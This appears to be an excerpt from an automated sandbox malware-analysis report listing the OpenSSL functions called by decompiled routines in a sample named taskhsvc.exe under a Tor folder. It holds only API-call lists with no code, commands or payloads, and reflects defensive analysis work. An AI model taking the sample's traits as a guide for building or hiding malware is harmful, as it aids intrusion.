            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD6430 SSL_CTX_use_certificate,X509_get_pubkey,EVP_PKEY_copy_parameters,ERR_clear_error,X509_check_private_key,EVP_PKEY_free,X509_free,CRYPTO_add_lock,EVP_PKEY_free,ERR_clear_error,ERR_put_error,RSA_flags,ERR_put_error,EVP_PKEY_free,86_2_6CDD6430
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC95D0 SSL_dup,SSL_new,SSL_copy_session_id,X509_VERIFY_PARAM_get_depth,X509_VERIFY_PARAM_set_depth,CRYPTO_dup_ex_data,BIO_ctrl,BIO_ctrl,CRYPTO_add_lock,X509_VERIFY_PARAM_inherit,sk_dup,sk_dup,sk_dup,sk_value,X509_NAME_dup,sk_set,sk_num,X509_NAME_free,ERR_put_error,__stack_chk_fail,EVP_CIPHER_CTX_cleanup,CRYPTO_free,EVP_CIPHER_CTX_cleanup,CRYPTO_free,COMP_CTX_free,COMP_CTX_free,__stack_chk_fail,SSL_get_certificate,__stack_chk_fail,SSL_get_privatekey,__stack_chk_fail,SSL_CTX_get0_certificate,__stack_chk_fail,SSL_CTX_get0_privatekey,__stack_chk_fail,SSL_get_current_cipher,__stack_chk_fail,SSL_get_current_compression,__stack_chk_fail,SSL_get_current_expansion,__stack_chk_fail,86_2_6CDC95D0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC0000 SSL_get_wbio,BIO_ctrl,EVP_CIPHER_CTX_flags,EVP_MD_CTX_md,EVP_MD_size,EVP_CIPHER_CTX_flags,SSL_get_wbio,BIO_ctrl,SSL_get_wbio,BIO_ctrl,OpenSSLDie,SSL_get_wbio,BIO_ctrl,SSL_ctrl,OpenSSLDie,OpenSSLDie,EVP_CIPHER_block_size,__stack_chk_fail,pqueue_peek,pqueue_pop,CRYPTO_free,CRYPTO_free,CRYPTO_free,pitem_free,EVP_CIPHER_CTX_free,EVP_MD_CTX_destroy,pqueue_pop,CRYPTO_free,CRYPTO_free,CRYPTO_free,pitem_free,ERR_put_error,ERR_put_error,ERR_put_error,pqueue_find,CRYPTO_malloc,pitem_new,pqueue_insert,OpenSSLDie,EVP_CIPHER_CTX_free,EVP_MD_CTX_destroy,ERR_put_error,__stack_chk_fail,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MD_CTX_destroy,CRYPTO_malloc,CRYPTO_free,86_2_6CDC0000
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDBC5C9 CRYPTO_free,ERR_put_error,86_2_6CDBC5C9
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCC5C0 sk_num,sk_value,X509_STORE_CTX_init,X509_STORE_CTX_set_flags,X509_STORE_CTX_set_ex_data,X509_STORE_CTX_set_default,X509_STORE_CTX_get0_param,X509_VERIFY_PARAM_set1,X509_STORE_CTX_set_verify_cb,X509_STORE_CTX_cleanup,ERR_put_error,X509_verify_cert,CRYPTO_lock,CRYPTO_lock,X509_STORE_CTX_get_ex_new_index,__stack_chk_fail,86_2_6CDCC5C0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD6430 SSL_CTX_use_certificate,X509_get_pubkey,EVP_PKEY_copy_parameters,ERR_clear_error,X509_check_private_key,EVP_PKEY_free,X509_free,CRYPTO_add_lock,EVP_PKEY_free,ERR_clear_error,ERR_put_error,RSA_flags,ERR_put_error,EVP_PKEY_free,86_2_6CDD6430
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCA590 SSL_CTX_get_ex_data,CRYPTO_get_ex_data,86_2_6CDCA590
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDAD5BB __stack_chk_fail,CRYPTO_free,__stack_chk_fail,__stack_chk_fail,86_2_6CDAD5BB
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD929B0 EVP_MD_CTX_init,BN_num_bits,BN_num_bits,EVP_MD_CTX_set_flags,EVP_DigestInit_ex,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,RSA_sign,EVP_MD_CTX_cleanup,DHparams_dup,DH_generate_key,BN_num_bits,BN_num_bits,BN_num_bits,BUF_MEM_grow_clean,BN_bn2bin,EVP_DigestInit_ex,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestUpdate,EVP_SignFinal,BN_num_bits,EC_KEY_dup,EC_KEY_get0_public_key,EC_KEY_get0_private_key,EC_KEY_generate_key,EC_KEY_get0_group,EC_KEY_get0_public_key,EC_KEY_get0_private_key,EC_GROUP_get_degree,EC_GROUP_get_curve_name,EC_KEY_get0_public_key,EC_POINT_point2oct,CRYPTO_malloc,BN_CTX_new,EC_KEY_get0_public_key,EC_POINT_point2oct,BN_CTX_free,strlen,strlen,strlen,strncpy,strlen,CRYPTO_free,EVP_PKEY_size,ERR_put_error,CRYPTO_free,BN_CTX_free,EVP_MD_CTX_cleanup,strlen,RSA_up_ref,ERR_put_error,EC_KEY_new_by_curve_name,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,__stack_chk_fail,ERR_put_error,ERR_put_error,86_2_6CD929B0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC55B0 SSL_accept,EVP_CIPHER_CTX_cleanup,CRYPTO_free,EVP_CIPHER_CTX_cleanup,CRYPTO_free,COMP_CTX_free,COMP_CTX_free,EVP_MD_CTX_destroy,EVP_MD_CTX_destroy,__stack_chk_fail,86_2_6CDC55B0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCE5AC ERR_put_error,CRYPTO_add_lock,BUF_strdup,CRYPTO_lock,CRYPTO_lock,SSL_has_matching_session_id,ERR_put_error,CRYPTO_add_lock,86_2_6CDCE5AC
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD65A9 EVP_PKEY_free,X509_free,CRYPTO_add_lock,EVP_PKEY_free,ERR_clear_error,86_2_6CDD65A9
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCF55C CRYPTO_add_lock,86_2_6CDCF55C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB355C CRYPTO_malloc,EVP_sha256,EVP_md5,EVP_sha1,EVP_sha224,EVP_sha384,EVP_sha512,86_2_6CDB355C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCA540 SSL_CTX_set_ex_data,CRYPTO_set_ex_data,86_2_6CDCA540
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB6509 OPENSSL_cleanse,CRYPTO_free,86_2_6CDB6509
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB3380 CRYPTO_free,CRYPTO_malloc,EVP_sha256,EVP_md5,EVP_sha1,EVP_sha224,EVP_sha384,EVP_sha512,EVP_sha1,EVP_sha1,EVP_sha1,EVP_sha1,__stack_chk_fail,CRYPTO_free,ERR_put_error,ERR_put_error,86_2_6CDB3380
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCE500 CRYPTO_add_lock,86_2_6CDCE500
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD3530 SSL_COMP_add_compression_method,CRYPTO_mem_ctrl,CRYPTO_malloc,sk_find,sk_push,CRYPTO_mem_ctrl,86_2_6CDD3530
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDAE529 CRYPTO_free,86_2_6CDAE529
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA8522 CRYPTO_lock,86_2_6CDA8522
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD9C6DC CRYPTO_free,86_2_6CD9C6DC
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC16D2 OpenSSLDie,pitem_new,pqueue_insert,OpenSSLDie,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MD_CTX_destroy,86_2_6CDC16D2
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDBA6C0 CRYPTO_free,CRYPTO_free,pitem_free,pqueue_pop,CRYPTO_free,CRYPTO_free,pitem_free,pqueue_pop,CRYPTO_free,CRYPTO_free,pitem_free,pqueue_pop,pitem_free,pqueue_pop,pitem_free,pqueue_pop,__stack_chk_fail,__stack_chk_fail,CRYPTO_malloc,pqueue_new,pqueue_new,pqueue_new,pqueue_new,pqueue_new,pqueue_free,pqueue_free,pqueue_free,pqueue_free,pqueue_free,CRYPTO_free,__stack_chk_fail,pqueue_pop,86_2_6CDBA6C0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC46C0 SSL_free,CRYPTO_add_lock,__stack_chk_fail,86_2_6CDC46C0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC56E0 SSL_connect,EVP_CIPHER_CTX_cleanup,CRYPTO_free,EVP_CIPHER_CTX_cleanup,CRYPTO_free,COMP_CTX_free,COMP_CTX_free,EVP_MD_CTX_destroy,EVP_MD_CTX_destroy,__stack_chk_fail,86_2_6CDC56E0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC4680 SSL_certs_clear,X509_free,EVP_PKEY_free,sk_pop_free,CRYPTO_free,86_2_6CDC4680
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDDC400 SSL_CONF_CTX_set1_prefix,BUF_strdup,CRYPTO_free,strlen,CRYPTO_free,__stack_chk_fail,SSL_CONF_CTX_set_ssl,__stack_chk_fail,SSL_CONF_CTX_set_ssl_ctx,__stack_chk_fail,SSL_set_info_callback,__stack_chk_fail,SSL_shutdown,CRYPTO_free,SSL_free,__stack_chk_fail,strlen,BIO_write,__stack_chk_fail,BIO_clear_flags,SSL_read,SSL_get_error,BIO_set_flags,BIO_set_flags,BIO_set_flags,BIO_set_flags,BIO_set_flags,time,SSL_renegotiate,SSL_renegotiate,__stack_chk_fail,BIO_clear_flags,SSL_write,SSL_get_error,BIO_set_flags,BIO_set_flags,BIO_set_flags,BIO_set_flags,time,SSL_renegotiate,SSL_renegotiate,__stack_chk_fail,CRYPTO_malloc,ERR_put_error,__stack_chk_fail,SSL_get_rbio,BIO_push,CRYPTO_add_lock,__stack_chk_fail,BIO_set_flags,BIO_callback_ctrl,86_2_6CDDC400
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB26A9 CRYPTO_free,CRYPTO_malloc,86_2_6CDB26A9
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD9F6A0 CRYPTO_free,strlen,BUF_strdup,ERR_put_error,ERR_put_error,ERR_put_error,86_2_6CD9F6A0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA19D0 __stack_chk_fail,COMP_CTX_free,COMP_CTX_new,EVP_CIPHER_CTX_cleanup,COMP_CTX_free,COMP_CTX_new,EVP_MD_size,EVP_CIPHER_key_length,EVP_CIPHER_iv_length,EVP_MD_CTX_init,EVP_CipherInit_ex,OPENSSL_cleanse,OPENSSL_cleanse,EVP_MD_CTX_cleanup,ERR_put_error,EVP_md5,EVP_DigestInit_ex,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_md5,EVP_DigestInit_ex,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,CRYPTO_malloc,EVP_CIPHER_CTX_init,CRYPTO_malloc,EVP_CIPHER_CTX_init,CRYPTO_malloc,ERR_put_error,OpenSSLDie,ERR_put_error,ERR_put_error,ERR_put_error,__stack_chk_fail,EVP_MD_size,EVP_CIPHER_key_length,EVP_CIPHER_iv_length,OPENSSL_cleanse,CRYPTO_free,CRYPTO_malloc,EVP_MD_CTX_init,EVP_MD_CTX_set_flags,EVP_MD_CTX_init,EVP_sha1,EVP_DigestInit_ex,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_md5,EVP_DigestInit_ex,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,ERR_put_error,ERR_put_error,OPENSSL_cleanse,EVP_MD_CTX_cleanup,EVP_MD_CTX_cleanup,ERR_put_error,__stack_chk_fail,EVP_DigestFinal_ex,86_2_6CDA19D0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD36A7 CRYPTO_free,CRYPTO_mem_ctrl,ERR_put_error,86_2_6CDD36A7
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB3380 CRYPTO_free,CRYPTO_malloc,EVP_sha256,EVP_md5,EVP_sha1,EVP_sha224,EVP_sha384,EVP_sha512,EVP_sha1,EVP_sha1,EVP_sha1,EVP_sha1,__stack_chk_fail,CRYPTO_free,ERR_put_error,ERR_put_error,86_2_6CDB3380
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD9A659 X509_get_pubkey,EVP_PKEY_CTX_new,EVP_PKEY_encrypt_init,RAND_bytes,EVP_MD_CTX_create,OBJ_nid2sn,EVP_get_digestbyname,EVP_DigestInit,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_MD_CTX_destroy,EVP_PKEY_CTX_ctrl,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,EVP_PKEY_free,86_2_6CD9A659
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA0650 __stack_chk_fail,CRYPTO_malloc,CRYPTO_free,86_2_6CDA0650
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD3657 CRYPTO_free,CRYPTO_mem_ctrl,ERR_put_error,86_2_6CDD3657
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB1657 strlen,CRYPTO_free,CRYPTO_malloc,86_2_6CDB1657
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD2649 sk_push,CRYPTO_free,sk_dup,sk_free,sk_free,sk_set_cmp_func,sk_sort,86_2_6CDD2649
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD96647 RAND_bytes,EVP_aes_128_cbc,EVP_EncryptInit_ex,EVP_sha256,HMAC_Init_ex,86_2_6CD96647
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCF60E CRYPTO_add_lock,time,86_2_6CDCF60E
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA0609 __stack_chk_fail,CONF_parse_list,CRYPTO_malloc,CRYPTO_free,86_2_6CDA0609
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCE639 ERR_put_error,CRYPTO_add_lock,86_2_6CDCE639
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDAE63C CRYPTO_free,86_2_6CDAE63C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD9A180 RAND_bytes,RSA_public_encrypt,OPENSSL_cleanse,EC_KEY_get0_group,EC_KEY_get0_public_key,EC_KEY_new,EC_KEY_set_group,EC_KEY_generate_key,EC_GROUP_get_degree,ECDH_compute_key,EC_KEY_get0_public_key,EC_POINT_point2oct,CRYPTO_malloc,BN_CTX_new,EC_KEY_get0_public_key,EC_POINT_point2oct,BN_CTX_free,CRYPTO_free,EC_KEY_free,EVP_PKEY_free,EVP_PKEY_get1_DH,DH_compute_key,DH_free,X509_get_pubkey,EVP_PKEY_CTX_new,EVP_PKEY_encrypt_init,RAND_bytes,EVP_MD_CTX_create,OBJ_nid2sn,EVP_get_digestbyname,EVP_DigestInit,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_MD_CTX_destroy,EVP_PKEY_CTX_ctrl,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,EVP_PKEY_free,BN_num_bits,BN_bn2bin,CRYPTO_free,BUF_strdup,SRP_generate_client_master_secret,ERR_put_error,BN_CTX_free,EVP_PKEY_free,X509_get_pubkey,EVP_PKEY_free,DHparams_dup,DH_generate_key,ERR_put_error,DH_free,BN_num_bits,BN_bn2bin,ERR_put_error,BN_CTX_free,CRYPTO_free,EC_KEY_free,strlen,ERR_put_error,OPENSSL_cleanse,OPENSSL_cleanse,X509_get_pubkey,ERR_put_error,ERR_put_error,BN_CTX_free,DH_free,ERR_put_error,X509_get_pubkey,EVP_PKEY_get1_DH,EVP_PKEY_free,ERR_put_error,EVP_PKEY_free,memmove,CRYPTO_free,BUF_strdup,CRYPTO_free,BUF_strdup,OPENSSL_cleanse,OPENSSL_cleanse,EVP_MD_CTX_destroy,ERR_put_error,EVP_PKEY_CTX_free,ERR_put_error,BN_CTX_free,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,__stack_chk_fail,ERR_put_error,ERR_put_error,ERR_put_error,BN_CTX_free,ERR_put_error,ERR_put_error,86_2_6CD9A180
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDAE62C CRYPTO_free,86_2_6CDAE62C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDADB40 ERR_put_error,__stack_chk_fail,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,__stack_chk_fail,CONF_parse_list,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,__stack_chk_fail,EC_KEY_get0_group,EC_GROUP_method_of,EC_METHOD_get_field_type,EC_GROUP_get_curve_name,ERR_put_error,EC_GROUP_get_curve_name,__stack_chk_fail,86_2_6CDADB40
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC37CE BUF_MEM_free,EVP_CIPHER_CTX_cleanup,CRYPTO_free,EVP_CIPHER_CTX_cleanup,CRYPTO_free,COMP_CTX_free,COMP_CTX_free,EVP_MD_CTX_destroy,EVP_MD_CTX_destroy,CRYPTO_free,SSL_SESSION_free,ERR_put_error,86_2_6CDC37CE
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA57EC EVP_MD_CTX_md,EVP_MD_CTX_md,EVP_MD_size,EVP_CIPHER_CTX_flags,EVP_CIPHER_CTX_flags,CRYPTO_memcmp,ERR_put_error,86_2_6CDA57EC
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD9F789 __stack_chk_fail,SSL_state,CRYPTO_malloc,RAND_bytes,RAND_bytes,CRYPTO_free,ERR_put_error,ERR_put_error,ERR_put_error,SSL_state,CRYPTO_malloc,RAND_bytes,RAND_bytes,CRYPTO_free,ERR_put_error,ERR_put_error,86_2_6CD9F789
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD9978C CRYPTO_malloc,86_2_6CD9978C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDAC786 CRYPTO_free,ERR_clear_error,86_2_6CDAC786
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD97BC ERR_put_error,asn1_add_error,SSL_SESSION_free,ASN1_INTEGER_get,CRYPTO_free,asn1_const_Finish,ASN1_get_object,d2i_ASN1_OCTET_STRING,BUF_strndup,CRYPTO_free,d2i_ASN1_OCTET_STRING,ASN1_const_check_infinite_end,86_2_6CDD97BC
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB37B0 CRYPTO_free,__stack_chk_fail,86_2_6CDB37B0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA27AC OPENSSL_cleanse,CRYPTO_free,86_2_6CDA27AC
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD9F759 CRYPTO_free,86_2_6CD9F759
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD0779 CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,86_2_6CDD0779
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC3779 CRYPTO_free,CRYPTO_free,CRYPTO_free,sk_pop_free,sk_pop_free,CRYPTO_free,CRYPTO_free,sk_pop_free,CRYPTO_add_lock,CRYPTO_free,sk_free,CRYPTO_free,86_2_6CDC3779
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC376C CRYPTO_free,sk_free,CRYPTO_free,86_2_6CDC376C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA0762 CRYPTO_free,strlen,ERR_put_error,BUF_strdup,ERR_put_error,86_2_6CDA0762
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD9764 ERR_put_error,asn1_add_error,SSL_SESSION_free,ASN1_INTEGER_get,CRYPTO_free,asn1_const_Finish,ASN1_get_object,d2i_ASN1_OCTET_STRING,BUF_strndup,CRYPTO_free,d2i_ASN1_OCTET_STRING,ASN1_const_check_infinite_end,86_2_6CDD9764
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD96715 CRYPTO_free,EVP_CIPHER_CTX_cleanup,HMAC_CTX_cleanup,SSL_SESSION_free,86_2_6CD96715
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDDE710 SRP_generate_server_master_secret,SRP_Verify_A_mod_N,SRP_Calc_u,SRP_Calc_server_key,BN_num_bits,CRYPTO_malloc,BN_bn2bin,OPENSSL_cleanse,CRYPTO_free,BN_clear_free,BN_clear_free,__stack_chk_fail,86_2_6CDDE710
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC2712 CRYPTO_free,86_2_6CDC2712
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD0700 CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,CRYPTO_mem_ctrl,sk_new,CRYPTO_malloc,COMP_zlib,sk_push,sk_sort,CRYPTO_mem_ctrl,CRYPTO_free,__stack_chk_fail,CRYPTO_malloc,CRYPTO_free,86_2_6CDD0700
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCE702 ERR_put_error,CRYPTO_add_lock,BUF_strdup,86_2_6CDCE702
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDAE0D9 CRYPTO_free,86_2_6CDAE0D9
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC70D0 SSL_set_alpn_protos,CRYPTO_free,CRYPTO_malloc,86_2_6CDC70D0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB80C0 BUF_memdup,__stack_chk_fail,__stack_chk_fail,SSL_CTX_add_client_custom_ext,CRYPTO_realloc,86_2_6CDB80C0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDAE089 CRYPTO_free,86_2_6CDAE089
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCB0B0 CRYPTO_malloc,EVP_sha1,EVP_sha1,EVP_sha1,EVP_sha1,ERR_put_error,__stack_chk_fail,86_2_6CDCB0B0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDDE0AC ERR_put_error,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,86_2_6CDDE0AC
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC7000 SSL_CTX_set_alpn_protos,CRYPTO_free,CRYPTO_malloc,86_2_6CDC7000
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC4050 SSL_CTX_set_session_id_context,ERR_put_error,__stack_chk_fail,SSL_set_session_id_context,ERR_put_error,__stack_chk_fail,SSL_CTX_set_generate_session_id,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,SSL_set_generate_session_id,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,SSL_has_matching_session_id,86_2_6CDC4050
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCC049 CRYPTO_add_lock,86_2_6CDCC049
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDAE04C CRYPTO_free,86_2_6CDAE04C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB4079 CRYPTO_free,ERR_put_error,86_2_6CDB4079
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA5070 ERR_put_error,__stack_chk_fail,EVP_MD_CTX_md,EVP_MD_CTX_md,EVP_MD_size,EVP_CIPHER_CTX_flags,EVP_CIPHER_CTX_flags,CRYPTO_memcmp,ERR_put_error,COMP_expand_block,ERR_put_error,ERR_put_error,OpenSSLDie,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,SSL_state,ERR_put_error,ERR_put_error,ERR_put_error,SSL_state,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,86_2_6CDA5070
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA806C CRYPTO_lock,CRYPTO_lock,CRYPTO_malloc,ERR_put_error,86_2_6CDA806C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDBD065 pqueue_pop,CRYPTO_free,CRYPTO_free,pitem_free,86_2_6CDBD065
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCB01C CRYPTO_lock,X509_STORE_CTX_get_ex_new_index,86_2_6CDCB01C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC0000 SSL_get_wbio,BIO_ctrl,EVP_CIPHER_CTX_flags,EVP_MD_CTX_md,EVP_MD_size,EVP_CIPHER_CTX_flags,SSL_get_wbio,BIO_ctrl,SSL_get_wbio,BIO_ctrl,OpenSSLDie,SSL_get_wbio,BIO_ctrl,SSL_ctrl,OpenSSLDie,OpenSSLDie,EVP_CIPHER_block_size,__stack_chk_fail,pqueue_peek,pqueue_pop,CRYPTO_free,CRYPTO_free,CRYPTO_free,pitem_free,EVP_CIPHER_CTX_free,EVP_MD_CTX_destroy,pqueue_pop,CRYPTO_free,CRYPTO_free,CRYPTO_free,pitem_free,ERR_put_error,ERR_put_error,ERR_put_error,pqueue_find,CRYPTO_malloc,pitem_new,pqueue_insert,OpenSSLDie,EVP_CIPHER_CTX_free,EVP_MD_CTX_destroy,ERR_put_error,__stack_chk_fail,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MD_CTX_destroy,CRYPTO_malloc,CRYPTO_free,86_2_6CDC0000
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC7000 SSL_CTX_set_alpn_protos,CRYPTO_free,CRYPTO_malloc,86_2_6CDC7000
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDAE005 CRYPTO_free,86_2_6CDAE005
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD8039 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_free,ERR_put_error,86_2_6CDD8039
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD4EA0 X509_get_pubkey,EVP_PKEY_copy_parameters,EVP_PKEY_free,ERR_clear_error,X509_check_private_key,EVP_PKEY_free,CRYPTO_add_lock,X509_check_private_key,ERR_clear_error,X509_check_private_key,RSA_flags,X509_free,ERR_put_error,ERR_put_error,EVP_PKEY_free,__stack_chk_fail,__stack_chk_fail,86_2_6CDD4EA0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA2027 CRYPTO_malloc,ERR_put_error,86_2_6CDA2027
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD0022 CRYPTO_lock,lh_retrieve,CRYPTO_lock,86_2_6CDD0022
